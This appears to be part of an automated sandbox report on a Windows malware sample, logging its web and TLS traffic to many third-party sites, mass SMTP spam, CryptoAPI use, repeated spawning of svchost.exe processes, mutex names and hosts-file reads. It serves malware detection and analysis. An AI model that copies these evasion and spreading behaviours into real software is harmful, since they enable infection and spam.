                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=bbd2a9ecd1f16e6deb08a6c096c7155a
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 5456
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 3856
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.6:50304 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.6:50309 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:50310 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.6:50328 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.6:50353 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:50343 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:50237 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.6:50341 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50342 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.6:50436 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50523 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.48.207:443 -> 192.168.2.6:50525 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.6:50527 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:50524 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:50827 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50893 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.6:52593 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:52635 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:52650 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.6:52648 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.6:52950 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:52125 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.6:53132 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.6:53263 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:52653 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.6:53355 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:53389 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.6:53348 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.6:53332 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:53391 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.6:53917 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:53642 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:54274 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:53695 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:54014 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:54830 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.6:54841 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:54938 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.6:55016 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:55461 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:55685 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.6:56976 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:58790 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:2059 version: TLS 1.2

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 50
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04008800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_04008800
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04008A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_04008A70
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04008970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_04008970
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_04008800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,2_2_04008800
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_04008A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,2_2_04008A70
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_04008970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,2_2_04008970
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_04008800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_04008800
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_04008A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_04008A70
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_04008970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,6_2_04008970
                      Source: iJzpyjAehB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_023700000_2_02370000
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0400B93510_2_0400B935
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_040072C410_2_040072C4
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_00401479 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,0_2_00401479
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_0040140E ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,0_2_0040140E
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_00401479 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,6_2_00401479
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_0040140E ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,6_2_0040140E
                      Source: iJzpyjAehB.exeStatic PE information: Number of sections : 18 > 10
                      Source: pigalicapi.exe.0.drStatic PE information: Number of sections : 18 > 10
                      Source: iJzpyjAehB.exeReversingLabs: Detection: 52%
                      Source: iJzpyjAehB.exeVirustotal: Detection: 23%
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeFile read: C:\Users\user\Desktop\iJzpyjAehB.exeJump to behavior
                      Source: iJzpyjAehB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\iJzpyjAehB.exe C:\Users\user\Desktop\iJzpyjAehB.exe
                      Source: unknownProcess created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
                      Source: unknownProcess created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                      Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@33/4@1944/100
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04001CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,0_2_04001CA0
                      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\zczoiir65502
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeMutant created: \Sessions\1\BaseNamedObjects\pigalicapi
                      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\rjsfitz60229
                      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\pvoaiwz6588
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
